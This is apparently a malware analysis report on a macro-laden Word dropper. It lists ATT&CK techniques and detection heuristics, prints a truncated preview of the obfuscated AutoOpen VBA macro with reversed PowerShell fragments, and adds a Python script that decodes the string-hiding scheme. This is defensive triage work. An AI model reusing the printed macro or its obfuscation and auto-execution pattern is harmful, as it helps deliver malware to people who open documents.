Verdict: MALICIOUS
Risk Score: 202

Malware Insights

MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1203 Exploitation for Client Execution
The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine, so the macro runs as soon as the document is opened with macros enabled. The macro makes a Shell() call, which indicates an intent to execute an external command, typically to launch a downloader for a second-stage payload; the ClamAV detection name Doc.Dropper.Agent-6544907-0 supports that dropper role. The extracted macro source is heavily obfuscated: randomly named subroutines padded with junk arithmetic (Sgn(), Fix() and CDbl() over random constants, and "N + k - N" expressions whose value is simply k), and string literals that are stored reversed and split with '+' seams. Read backwards they are PowerShell fragments ("ECAlpER-" is "-rEplACE", "]Rahc[" is "[chaR]"), including a -replace chain that swaps placeholder tokens for the characters $ (chr 36), ' (chr 39) and " (chr 34) before the script is assembled. Note that none of the findings on this page describes a parser exploit: execution depends on the recipient enabling macros, and the only extracted URL is the OOXML DrawingML schema namespace, not a network indicator.
Heuristics (6)

- ClamAV: Doc.Dropper.Agent-6544907-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Dropper.Agent-6544907-0
- VBA macros detected [medium, OLE_VBA_MACROS, 2 related findings]: Document contains VBA macro code
- Shell() call in VBA [critical, OLE_VBA_SHELL]: Shell() call in VBA
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. (This is the analyzer's canned description; on this sample a VBA project was in fact recovered, see Extracted artifacts below, so the VBA findings above are the stronger evidence.)
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the OOXML DrawingML namespace URI that Office writes into every drawing part; it is not a download or command-and-control address and should not be treated as an indicator.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: 597832bdd9b1b62845e37a630ac7b8cd97a43422f028ed490f44b860bf3e6ef1) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 133012 bytes |

Preview: first 1,000 lines of the extracted script
Attribute VB_Name = "VWLjDIbk"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub IJwrW(QlvRS)
aYILD = UqtPLN
pKjFj = EBWClw
jEbsHH = QptXj + Sgn(89850 - dJUsz - ohAjjP + Fix(48548)) - 26850 - CDbl(38574)
WWMXu = 30203
End Sub
Sub BIDAm(RJYlSb)
BJoMrC = rLriw
lXATXi = tTktk
hiaHd = mcCMi + Sgn(121 - sLYpQV - pOuIE + Fix(27279)) - 76675 - CDbl(26470)
hZucpU = 41658
DNcMU = KRTrmC
iTYiM = oRDPS
dVnoX = YpHlDs + Sgn(81107 - jjqkW - LdDGV + Fix(88226)) - 56366 - CDbl(1639)
wAwJnr = 24888
dwBON = sQjsr
FbSsRN = RjTdM
IIlFj = dTLNo + Sgn(41922 - wPLqpB - ObXhFs + Fix(49702)) - 82186 - CDbl(91529)
KSorEF = 14527
End Sub
Sub wpNSu(iXfPl)
qdcbI = kDzrcm
UCWhu = JDfsMY
hJCiMK = pAjpN + Sgn(66717 - VDLFM - uZLIpk + Fix(41455)) - 54469 - CDbl(5139)
lPCNA = 51410
RiShi = WjULW
zUmzzA = wusco
mpvZKU = uDtbt + Sgn(86587 - FpbUY - oCrwQF + Fix(25609)) - 86080 - CDbl(54508)
ZBdEw = 58381
End Sub
Sub Autoopen()
On Error Resume Next
GKqAsw = KFEoBJ
XDqoj = wJEHdS
UZQoQb = UKhwv + Sgn(12233 - nKBZq - mBwnQ + Fix(23670)) - 61292 - CDbl(57346)
FjWazG = 71437
wYkGjVYTazT (QYauwN + jSPwbUmOsOi + rsdiJ)
DimzKT = dXDvkX
wbVGK = UkAQY
odvXiz = wBAjb + Sgn(77904 - JMsUfJ - IWQXWX + Fix(13009)) - 60446 - CDbl(36051)
WaXiwh = 535
End Sub
Sub zQaCw(tSWsHs)
lPMfGf = MZNRjS
BRILi = zhtzFY
iDAOX = BlKKz + Sgn(84780 - AIXCJ - ffsBO + Fix(63787)) - 56324 - CDbl(1752)
DWMZhG = 41906
ZzuJR = qGITbr
Jqqmtt = CmjuZU
ozZKwi = wCPKND + Sgn(3342 - FNBJpu - WnoNjF + Fix(74476)) - 36128 - CDbl(99658)
zuBIjI = 61073
rLobb = pkIjTs
inJbl = iutLj
aQJAl = EVwwi + Sgn(82580 - LIYzzG - HUSGrh + Fix(95557)) - 73840 - CDbl(95127)
zzELB = 30020
End Sub
Sub kWKOWT(ESjZOK)
vFkIFz = IEYSY
AjmjKs = PbvlkA
BYAXYn = BtUDw + Sgn(34907 - bSlvwp - UjzPVS + Fix(61720)) - 40258 - CDbl(19023)
YELBjD = 1479
End Sub
Attribute VB_Name = "lGwqSfNaOnIKpl"
Sub GjsCI(UqhjV)
rHcsPk = NihiN
CvEsM = JmtEUq
srQPR = zAWTm + Sgn(91340 - ZoXcYC - kFHQwU + Fix(68832)) - 22637 - CDbl(85494)
CHBOsJ = 94600
End Sub
Function jSPwbUmOsOi()
On Error Resume Next
QXPRj = RwTaVO
jRLPm = zRwXlH
Riuih = aJHfPS + Sgn(49951 - wBAJqd - VppwFY + Fix(94794)) - 2513 - CDbl(38015)
iJIKn = 5500
KmiqD = AjQfAf
TOOjho = OzYzi
rMQVR = qoGqTs + Sgn(53765 - wHITp - SpiEhj + Fix(54075)) - 79660 - CDbl(1358)
NlIlj = 78017
KzjzSSpDjr = cHWlzB("dsMC2'C'+'+wKCxe'+'.w'+'K'+'C( '+'+ '+'Bo", 72130 + 2 - 72130, 72130 + 35 - 72130)
vODoI = YvrFX
HpEIE = BhMnhU
ntcij = iJoNFl + Sgn(78763 - cGIqi - QsXId + Fix(7929)) - 73555 - CDbl(64223)
GHjjn = 40354
jVZJwr = sWfuv
wOJhmH = donZk
awrPtz = TTEZTJ + Sgn(70184 - uqFbd - PlGjWF + Fix(65639)) - 41751 - CDbl(90881)
AYNQKB = 14509
ADoAmP = cHWlzB("G9JIHnApSNAwi'+' + '+'wKChsQwKC '+'+ cilbup'+':v'+'ne'+'A'+'wi ='+' C'+'DS'+'A'+'wi;)'+'wK'+'C'+'@'+'w'+'KC(ti'+'lp'+j", 38650 + 2 - 38650, 38650 + 109 - 38650)
zFOfKk = cXBjw
zGzLLk = WrIwXW
uwUts = TiYXkb + Sgn(43828 - tijmz - CRNFwQ + Fix(53778)) - 29586 - CDbl(12347)
QHnKTf = 6105
oSZGB = XYLRrK
ZcocOf = AKXVS
nfAzzD = oTrVAU + Sgn(4290 - dwzls - TJwQjE + Fix(27846)) - 48237 - CDbl(59212)
EoNIsX = 27642
afSAfAJzrp = cHWlzB("W3L55 ECAlpER- 43]Rahc[,)96]Rahc[+58]Rahc[+86]Rahc[( ECALPERc- 93]Rahc[,'wKC' ECALPERc-63]Rahc[,)56]Rahc[+911]Rahc[+501]Rahc[( ECAlpER-)'}}{hcta'+'c};kaer'+'b'+';)CDSAwi'+S", 15763 + 2 - 15763, 15763 + 170 - 15763)
ncsFk = cudsX
ZjZFU = BjOzT
owQMG = hFhdwP + Sgn(80544 - Yfopb - CQVVO + Fix(15124)) - 76841 - CDbl(42132)
hFoJd = 32607
jlcnC = tGYmj
rutwD = WGNNL
EAJAo = MHUIj + Sgn(51975 - FJvYhF - zUjjK + Fix(13346)) - 12194 - CDbl(74624)
NKTZY = 68314
RiuGZqIUWQv = cHWlzB("NFG828'+'oD'+'EUD.UY'+'YAwi{y'+'rt'+'{'+')'+'XCDAAwi'+' ni '+'cfsa'+EWi", 75913 + 4 - 75913, 75913 + 64 - 75913)
CsRBa = qiLSIw
ahfIz = jTcph
ZlHwP = OVItj + Sgn(30090 - mViwU - wHXvfi + Fix(21061)) - 50929 - CDbl(35447)
hZDkl = 1406
filaw =
... (truncated)
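The preview above shows the macro's string-hiding scheme directly: every cHWlzB(...) argument is a reversed string, the '+' seams are what is left of PowerShell 'a'+'b' concatenation, the numeric arguments are "N + k - N" junk arithmetic, and one fragment (reversed: -REplACE ([chaR]105+[chaR]119+[chaR]65),[chaR]36 -cREPLACE 'CKw',[chaR]39 ...) is the -replace chain that turns placeholder tokens back into $, ' and ". The script below is an added triage example written for this report; it is not part of the analyzer, of oletools, or of the sample. Its only input is the four string literals copied verbatim from the preview, it reads the placeholder table off the reversed chain rather than hard-coding it, and it assumes nothing about cHWlzB itself: that function's body is not in the preview, so the folded start/length values are reported but not applied to the strings.

```python
import re

# Constructed sample input: the four cHWlzB("...") calls visible in the
# report's macro preview, copied verbatim. The body of cHWlzB is not in the
# preview, so what it does with the two numeric arguments is unknown; this
# script only folds the "N + k - N" arithmetic and works on the literal.
SAMPLE_VBA = r'''
KzjzSSpDjr = cHWlzB("dsMC2'C'+'+wKCxe'+'.w'+'K'+'C( '+'+ '+'Bo", 72130 + 2 - 72130, 72130 + 35 - 72130)
ADoAmP = cHWlzB("G9JIHnApSNAwi'+' + '+'wKChsQwKC '+'+ cilbup'+':v'+'ne'+'A'+'wi ='+' C'+'DS'+'A'+'wi;)'+'wK'+'C'+'@'+'w'+'KC(ti'+'lp'+j", 38650 + 2 - 38650, 38650 + 109 - 38650)
afSAfAJzrp = cHWlzB("W3L55 ECAlpER- 43]Rahc[,)96]Rahc[+58]Rahc[+86]Rahc[( ECALPERc- 93]Rahc[,'wKC' ECALPERc-63]Rahc[,)56]Rahc[+911]Rahc[+501]Rahc[( ECAlpER-)'}}{hcta'+'c};kaer'+'b'+';)CDSAwi'+S", 15763 + 2 - 15763, 15763 + 170 - 15763)
RiuGZqIUWQv = cHWlzB("NFG828'+'oD'+'EUD.UY'+'YAwi{y'+'rt'+'{'+')'+'XCDAAwi'+' ni '+'cfsa'+EWi", 75913 + 4 - 75913, 75913 + 64 - 75913)
'''

# cHWlzB("<literal>", A + B - C, D + E - F): capture the literal and the six numbers.
CALL_RE = re.compile(
    r'cHWlzB\("([^"]*)",\s*(\d+)\s*\+\s*(\d+)\s*-\s*(\d+),\s*(\d+)\s*\+\s*(\d+)\s*-\s*(\d+)\)')
# PowerShell [char]N (any casing, the sample writes [chaR]).
CHAR_RE = re.compile(r"\[char\](\d+)", re.I)
# One link of the chain: -replace <pattern>,[char]N where <pattern> is either a
# parenthesised [char] sum or a single-quoted literal. -creplace is case-sensitive.
REPLACE_RE = re.compile(r"-c?replace\s+(\([^)]*\)|'[^']*'),\s*\[char\](\d+)", re.I)


def extract_calls(vba: str):
    """Return (literal, start, length) per cHWlzB call, folding A+B-C to its value."""
    calls = []
    for lit, a, b, c, d, e, f in CALL_RE.findall(vba):
        calls.append((lit, int(a) + int(b) - int(c), int(d) + int(e) - int(f)))
    return calls


def unscramble(literal: str) -> str:
    """Reverse the literal, then drop the '+' seams left from 'a'+'b' concatenation."""
    return literal[::-1].replace("'+'", "")


def chars_to_text(expr: str) -> str:
    """'([chaR]105+[chaR]119+[chaR]65)' -> 'iwA'."""
    return "".join(chr(int(n)) for n in CHAR_RE.findall(expr))


def placeholder_map(fragments) -> dict:
    """Read placeholder -> real character out of any -replace chain in the fragments."""
    mapping = {}
    for frag in fragments:
        for pat, code in REPLACE_RE.findall(frag):
            key = pat.strip("'") if pat.startswith("'") else chars_to_text(pat)
            mapping[key] = chr(int(code))
    return mapping


def decode(vba: str):
    """Full pass: (placeholder map, decoded fragments in source order).

    The fragment that carries the -replace chain is the decoder, not data, so
    it is returned as-is; every other fragment gets the placeholders swapped.
    """
    fragments = [unscramble(lit) for lit, _, _ in extract_calls(vba)]
    mapping = placeholder_map(fragments)
    decoded = []
    for frag in fragments:
        if not REPLACE_RE.search(frag):
            for placeholder, char in mapping.items():
                frag = frag.replace(placeholder, char)
        decoded.append(frag)
    return mapping, decoded


if __name__ == "__main__":
    mapping, decoded = decode(SAMPLE_VBA)
    print("placeholders:", mapping)
    for (_, start, length), frag in zip(extract_calls(SAMPLE_VBA), decoded):
        # start/length are the folded numeric arguments; their meaning depends
        # on cHWlzB, which is not in the preview, so they are only reported.
        print(f"[folded args: {start}, {length}] {frag}")
```

Run as a script it prints the placeholder table {'iwA': '$', 'CKw': "'", 'DUE': '"'} and the four fragments; the second one reads split('@');$SDC = $env:public + 'Qsh' + $NSpAnHIJ9G, i.e. a path under $env:public is being assembled, and the fourth shows the start of a foreach/try loop. That is enough for triage without running the macro; olevba's --deobf and --reveal options perform a more general version of the same substitution over the whole module.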